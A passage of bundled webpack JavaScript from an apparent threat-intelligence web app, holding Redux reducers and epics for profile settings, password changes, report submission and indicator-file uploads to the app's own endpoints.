    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REVIEW_REPORT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REVIEW_REPORT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT_FAILURE"]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  form: form,
  currentStage: currentStage,
  submissionType: submissionType,
  applyRedaction: applyRedaction,
  attachFileLoading: attachFileLoading,
  loading: loading
}));

/***/ }),
/* 2908 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export fetchEpic */
/* unused harmony export fetchQuotasEpic */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__actions__ = __webpack_require__(571);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__types_js__ = __webpack_require__(704);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__getters_js__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_app_actions_js__ = __webpack_require__(569);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_app_getters__ = __webpack_require__(182);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_themes_common_constants__ = __webpack_require__(406);






var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:profile:epics'); // eslint-disable-line no-unused-vars










var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* FETCH */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__types_js__["b" /* PROFILE_ENDPOINT */]).mergeMap(function (_ref2) {
      var response = _ref2.response;

      var successAction = {
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["f" /* FETCH_SUCCESS */],
        payload: response
      };

      if (response.preferences && response.preferences.themeMode) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_9_modules_app_actions_js__["setThemeFromPreferences"])(response.preferences.themeMode), successAction]);
      } else {
        // If the user doesn't have a theme selected, we check if they've got something in the localStorage by checking the Redux's store.
        // If they still have nothing, we default to the Light theme and update their preferences.
        var storedTheme = Object(__WEBPACK_IMPORTED_MODULE_10_modules_app_getters__["theme"])(store.getState());
        var themeMode = storedTheme && storedTheme !== __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_themes_common_constants__["c" /* NO_THEME */] ? storedTheme : __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_themes_common_constants__["b" /* LIGHT_THEME */];

        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_5__actions__["updatePreferences"])({ themeMode: themeMode.toUpperCase() }), successAction]);
      }
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["b" /* FETCH_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'There was an error fetching your settings' }
        }
      });
    });
  });
};

var fetchQuotasEpic = function fetchQuotasEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["c" /* FETCH_QUOTAS */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_6__types_js__["c" /* PROFILE_QUOTAS_ENDPOINT */]).map(function (_ref4) {
      var response = _ref4.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["e" /* FETCH_QUOTAS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* FETCH_QUOTAS_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'There was an error fetching your quota settings' }
        }
      });
    });
  });
};

var updateEpic = function updateEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["l" /* UPDATE */]).switchMap(function (action) {
    var profile = __WEBPACK_IMPORTED_MODULE_7__getters_js__["profile"](store.getState());
    var payload = profile.merge(action.payload).update('company', function (c) {
      return c.delete('enclaves');
    });

    if (!profile.get('id')) {
      throw new Error('No user ID found.');
    }

    var url = '/services/users/' + profile.get('guid');
    return ajax.postJSON(url, payload).map(function (_ref6) {
      var response = _ref6.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["q" /* UPDATE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'User updated successfully.' }
        }
      };
    }).catch(function (err) {
      var message = err.status === 400 ? 'User with this email already exists.' : 'User could not be updated';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["m" /* UPDATE_FAILURE */],
        payload: err,
        error: true,
        meta: {
          alert: { type: 'error', text: message }
        }
      });
    });
  });
};

var updatePreferencesEpic = function updatePreferencesEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["n" /* UPDATE_PREFERENCES */]).mergeMap(function (_ref8) {
    var payload = _ref8.payload;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__types_js__["a" /* PREFERENCES_ENDPOINT */], payload).mergeMap(function (_ref9) {
      var response = _ref9.response;

      return [{ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["p" /* UPDATE_PREFERENCES_SUCCESS */], payload: response }, Object(__WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__["success"])('User preferences updated successfully.')];
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["o" /* UPDATE_PREFERENCES_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__["error"])('User preferences could not be updated. Please reload this page and try again.')]);
    });
  });
};

var updateThemeOptionsFromPreferences = function updateThemeOptionsFromPreferences(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["n" /* UPDATE_PREFERENCES */]).pluck('payload', 'themeMode').filter(function (themeMode) {
    return !!themeMode;
  }).map(function (themeMode) {
    return Object(__WEBPACK_IMPORTED_MODULE_9_modules_app_actions_js__["setThemeFromPreferences"])(themeMode);
  });
};

var updatePasswordEpic = function updatePasswordEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["i" /* SAVE_PASSWORD */]).mergeMap(function (_ref11) {
    var payload = _ref11.payload;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_6__types_js__["b" /* PROFILE_ENDPOINT */] + '/password', payload).mergeMap(function (_ref12) {
      var response = _ref12.response;

      return [{ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["k" /* SAVE_PASSWORD_SUCCESS */], payload: response }, Object(__WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__["success"])('Password changed successfully.')];
    }).catch(function (err) {
      var actions = [{ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["j" /* SAVE_PASSWORD_FAILURE */] }];
      if (err.status === 403) {
        actions.push(Object(__WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__["error"])('The current password you entered is incorrect.'));
      } else {
        actions.push(Object(__WEBPACK_IMPORTED_MODULE_8_modules_alerts_actions_js__["error"])('Password could not be saved. Please reload this page and try again.'));
      }
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(actions);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, fetchQuotasEpic, updateEpic, updatePreferencesEpic, updatePasswordEpic, updateThemeOptionsFromPreferences));

/***/ }),
/* 2909 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_path__ = __webpack_require__(495);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_path___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_path__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__getters_js__ = __webpack_require__(709);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_reports_getters_js__ = __webpack_require__(215);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_reports_actions_js__ = __webpack_require__(409);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_reports_action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17__actions__ = __webpack_require__(1303);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18__getters__ = __webpack_require__(709);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19__constants_js__ = __webpack_require__(561);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20__action_types_js__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21__utils_js__ = __webpack_require__(711);










var debug = __WEBPACK_IMPORTED_MODULE_7_debug___default()('app:modules:redaction:epics'); // eslint-disable-line no-unused-vars















/* Check report content before moving to 'review' stage */
var reviewReportEpic = function reviewReportEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["REVIEW_REPORT"]).mergeMap(function (_ref) {
    var _ref$payload = _ref.payload,
        report = _ref$payload.report,
        redirect = _ref$payload.redirect;

    var validationError = Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["e" /* validateReportContent */])(report);
    if (validationError) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["REVIEW_REPORT_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(validationError)];
    } else {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["REVIEW_REPORT_SUCCESS"] }).do(function () {
        return __WEBPACK_IMPORTED_MODULE_2_react_router__["browserHistory"].push(redirect);
      });
    }
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["REVIEW_REPORT_FAILURE"] });
  });
};

var invalidSubmissionEpic = function invalidSubmissionEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_REPORT"]).filter(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */]).map(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */]).map(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"]);
};

/* Submit IOCs — handles both regular submission and special file submission */
var submitIndicatorsEpic = function submitIndicatorsEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS"], __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS_FILE"]).map(function (action) {
    var endpoint = action.type === __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS"] ? __WEBPACK_IMPORTED_MODULE_19__constants_js__["b" /* INDICATORS_ENDPOINT */] : __WEBPACK_IMPORTED_MODULE_19__constants_js__["c" /* INDICATORS_FILE_ENDPOINT */];

    var request = action.payload.update('content', function (c) {
      return c.get('data');
    });

    return { endpoint: endpoint, request: request };
  }).mergeMap(function (x) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(x).switchMap(function (_ref3) {
      var request = _ref3.request,
          endpoint = _ref3.endpoint;

      return ajax.postJSON(endpoint, request).delay(3000) // Artificial delay to allow the server to "work"
      .mergeMap(function (response) {
        return [{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS_SUCCESS"], payload: response }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["success"])('Indicator submission received. You will receive an email notification after processing is complete.')];
      }).do(function () {
        return __WEBPACK_IMPORTED_MODULE_2_react_router__["browserHistory"].push('/browse/iocs');
      }).catch(function (err) {
        var message = Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["path"])(['xhr', 'response', 'message'], err);
        return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS_FAILURE"], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(message ? message : 'An error occurred.')]);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_INDICATORS_FAILURE"], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])('There was an error submitting the indicators.')]);
    });
  });
};

/* Submit a new report */
var submitReportEpic = function submitReportEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_REPORT"]).filter(function (action) {
    return !Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */])(action);
  }).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(action).mergeMap(function (_ref5) {
      var report = _ref5.payload;

      var param = report.get('sendNotification') ? 'true' : 'false';
      var url = __WEBPACK_IMPORTED_MODULE_19__constants_js__["i" /* SUBMIT_ENDPOINT */] + '?sendNotification=' + param;
      var body = Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["d" /* toJSON */])(report, store.getState);
      return ajax.postJSON(url, body).map(function (_ref6) {
        var _ref6$response = _ref6.response,
            id = _ref6$response.id,
            submissionVersion = _ref6$response.submissionVersion;
        return {
          type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_REPORT_SUCCESS"],
          payload: { id: id, submissionVersion: submissionVersion }
        };
      }).catch(function (err) {
        var message = Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["path"])(['xhr', 'response', 'message'], err);
        return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_REPORT_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(message ? message : 'An error occurred.')]);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["SUBMIT_REPORT_FAILURE"], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])('There was an error submitting the report')]);
    });
  });
};

var invalidUpdateEpic = function invalidUpdateEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPDATE_REPORT"]).filter(function (x) {
    return Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["f" /* validateReportError */])(x) || Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */])(x);
  }).map(function (x) {
    return Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["f" /* validateReportError */])(x) || Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */])(x);
  }).map(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"]);
};

/* Update a report */
var updateReportEpic = function updateReportEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPDATE_REPORT"]).filter(function (x) {
    return !Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["f" /* validateReportError */])(x) && !Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["b" /* getValidationError */])(x);
  }).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(action).mergeMap(function (_ref8) {
      var report = _ref8.payload;

      var id = report.get('id');
      var param = report.get('sendNotification') ? 'true' : 'false';
      var url = __WEBPACK_IMPORTED_MODULE_19__constants_js__["i" /* SUBMIT_ENDPOINT */] + '/' + id + '?sendNotification=' + param;
      var body = Object(__WEBPACK_IMPORTED_MODULE_21__utils_js__["d" /* toJSON */])(report, store.getState);
      return ajax.putJSON(url, body).map(function (_ref9) {
        var _ref9$response = _ref9.response,
            id = _ref9$response.id,
            submissionVersion = _ref9$response.submissionVersion;
        return {
          type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPDATE_REPORT_SUCCESS"],
          payload: { id: id, submissionVersion: submissionVersion }
        };
      }).catch(function (err) {
        var message = Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["path"])(['xhr', 'response', 'message'], err);
        return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPDATE_REPORT_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(message ? message : 'An error occurred.')]);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPDATE_REPORT_FAILURE"], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])('There was an error updating the report')]);
    });
  });
};

/**
 * NOTES on file upload:
 *
 * NOTE: We are passed an array of files. For now though we only allow the user
 * to upload one.
 *
 * NOTE: This sets the 'content' key of our form values because the user can
 * also manually type in values. The value we are storing in state did not
 * necessarily come from a file.
 *
 * NOTE: We try to tell the server that we are explicitly expecting a string,
 * but at the time of this writing it isn't respecting that header. Which leads
 * us to the next NOTE...
 *
 * NOTE: We guard against a json value being returned and being parsed into an
 * object by axios. We need to ensure that the extracted content is indeed a
 * string.
 */

var validateFileEpic = function validateFileEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_FILE"]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(action).mergeMap(function (_ref10) {
      var file = _ref10.payload;

      if (!file) {
        var message = 'Could not upload file. This type of file may not be supported.';
        throw new Error(message);
      } else {
        var name = file.name,
            size = file.size,
            type = file.type;

        var sizeInMb = Object(__WEBPACK_IMPORTED_MODULE_12_trustar_utils_utils_js__["bytesToMb"])(size);

        var data = new FormData();
        data.append('uploadedFile', file);

        if (sizeInMb > 2) {
          // TODO_LOG Raven.captureMessage('User tried to upload a file larger than 2MB for report submission.', { level: 'info' });
          throw new Error('File too large. The max file size is 2MB.');
        }

        return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPLOAD_FILE"],
          payload: { name: name, size: size, type: type, data: data }
        });
      }
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_FILE_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(err.message)]);
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_FILE_FAILURE"] });
  });
};

// attach and upload in one epic
var uploadIndicatorsFileEpic = function uploadIndicatorsFileEpic(action$, _ref11, _ref12) {
  var getState = _ref11.getState;
  var ajax = _ref12.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE"]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(action).map(function (_ref13) {
      var file = _ref13.payload;
      var size = file.size;

      var sizeInMb = Object(__WEBPACK_IMPORTED_MODULE_12_trustar_utils_utils_js__["bytesToMb"])(size);

      // Add any other validation here...
      if (sizeInMb > 2) {
        // TODO_LOG Raven.captureMessage('User tried to upload a file larger than 2MB for IOC submission.', { level: 'info' });
        throw new Error('File too large. The max file size is 2MB.');
      }

      var data = new FormData();
      data.append('uploadedFile', file);
      return data;
    }).mergeMap(function (data) {
      return ajax({
        method: 'POST',
        url: __WEBPACK_IMPORTED_MODULE_19__constants_js__["k" /* UPLOAD_ENDPOINT */] + '/indicators-file',
        body: data,
        headers: { Accept: '*/*' }
      }).map(Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["prop"])('response')).mergeMap(function (data) {
        return [Object(__WEBPACK_IMPORTED_MODULE_17__actions__["updateField"])(['content', 'data'], Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["fromJS"])(data)), { type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS"] }];
      }).catch(function (err) {
        var message = Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["path"])(['xhr', 'response', 'message'], err);
        return [Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(message ? message : 'There was an error uploading the file.'), { type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE"], payload: err }];
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(err.message), { type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE"], payload: err }]);
    });
  });
};

/**
 * NOTE: The server is returning Content-Type: application/json regardless of
 * the actual content type. So in this case when the content is a string rxjs
 * would use its default responseType (json) to try to parse the response body
 * from the server. This would of course fail since its plain text, leaving
 * res.respones as null. By manually setting responseType to text we get around
 * this issue.
 *
 * See FileExtractionController.java for the server implementation.
 */
var uploadFileEpic = function uploadFileEpic(action$, _ref14, _ref15) {
  var getState = _ref14.getState;
  var ajax = _ref15.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPLOAD_FILE"]).mergeMap(function (_ref16) {
    var _ref16$payload = _ref16.payload,
        name = _ref16$payload.name,
        size = _ref16$payload.size,
        type = _ref16$payload.type,
        data = _ref16$payload.data;

    return ajax({
      method: 'POST',
      url: __WEBPACK_IMPORTED_MODULE_19__constants_js__["k" /* UPLOAD_ENDPOINT */],
      body: data,
      headers: { Accept: '*/*' },
      responseType: 'text' // See NOTE
    }).mergeMap(function (_ref17) {
      var response = _ref17.response;

      // Verify the response is a string
      if (Object(__WEBPACK_IMPORTED_MODULE_13_trustar_utils__["isObject"])(response) && !__WEBPACK_IMPORTED_MODULE_5_lodash_isstring___default()(response)) {
        try {
          response = JSON.stringify(response, null, 2);
        } catch (err) {
          response = Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["toString"])(response);
        }
      }

      var action = [];
      var payload = { name: name, size: size, type: type, data: response };
      var currentValues = Object(__WEBPACK_IMPORTED_MODULE_18__getters__["formValues"])(getState());

      // Update form content with extracted report content
      action.push(Object(__WEBPACK_IMPORTED_MODULE_17__actions__["updateField"])(['content'], Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["fromJS"])(payload)));

      // Set the title to the filename if there is no title
      if (!currentValues.get('title')) {
        var titleFromFilename = __WEBPACK_IMPORTED_MODULE_0_path___default.a.basename(name, __WEBPACK_IMPORTED_MODULE_0_path___default.a.extname(name));
        action.push(Object(__WEBPACK_IMPORTED_MODULE_17__actions__["updateField"])(['title'], titleFromFilename));
      }

      return action.concat({ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPLOAD_FILE_SUCCESS"] });
    }).catch(function (err) {
      var text = '';
      var serverResponse = '';
      try {
        serverResponse = JSON.parse(err.response).message;
      } catch (err) {
        serverResponse = '';
        console.error(err);
      }

      if (err && err.status === 413) {
        // validateFileEpic should prevent this from happening
        text = 'There was an error uploading the file. The report must contain less than 2000 extracted indicators and be less than 2MB.';
      } else if (serverResponse !== '') {
        text = serverResponse;
      } else if (err && err.message) {
        text = err.message;
      } else {
        text = 'There was an error uploading the file.';
      }

      return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["UPLOAD_FILE_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["error"])(text)]);
    });
  });
};

/**
 * NOTE: This function has caused ALL SORTS OF BUGS. It's decreasing dev
 * bandwidth. However, it can be refactored after move to redux so for now it
 * stays, with this odd warning about how we don't support linking directly in
 * to a report update :/
 *
 * NOTE: We have some intertwined data in the same object. It creates a huge
 * amount of complexity overhead and should be refactored, but it pervades the
 * entire app (front and back end) so that will need to come at another time.
 */
var toUpdate = function toUpdate(report, distributionType, enclaves) {
  if (!report) {
    console.warn('Updating reports before initially load is not supported.');
    return Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["Map"])();
  }
  var result = {
    id: report.get('id'),
    title: report.get('title'),
    externalTrackingId: report.get('externalTrackingId'),
    content: { data: report.get('reportBody') },
    distributionType: distributionType,
    enclaves: distributionType === 'ENCLAVE' ? enclaves.map(function (x) {
      return x.get('id');
    }).toArray() : [], // See NOTE
    sector: report.get('sector'),
    attributes: report.get('attributes', Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["OrderedMap"])()).map(function (x) {
      return x.get('name');
    }).toList(),
    timeBegan: report.get('timeBeganUnknown') ? null : __WEBPACK_IMPORTED_MODULE_3_moment_timezone___default.a.tz(report.get('timeBegan'), report.get('timeBeganTimezone')).format(__WEBPACK_IMPORTED_MODULE_19__constants_js__["f" /* JAVA_DATE_FORMAT */]),
    tags: report.get('tags', Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["List"])()).toList().map(function (tag) {
      return tag.get('name');
    })
  };

  return Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["fromJS"])(result);
};

/**
 * The idea here is simple enough but the logic has become quite convoluted. We
 * want to "load" the data of a report in to the report creation / edit form so
 * that the user can edit it. Makes sense. But there's no guarantee that the
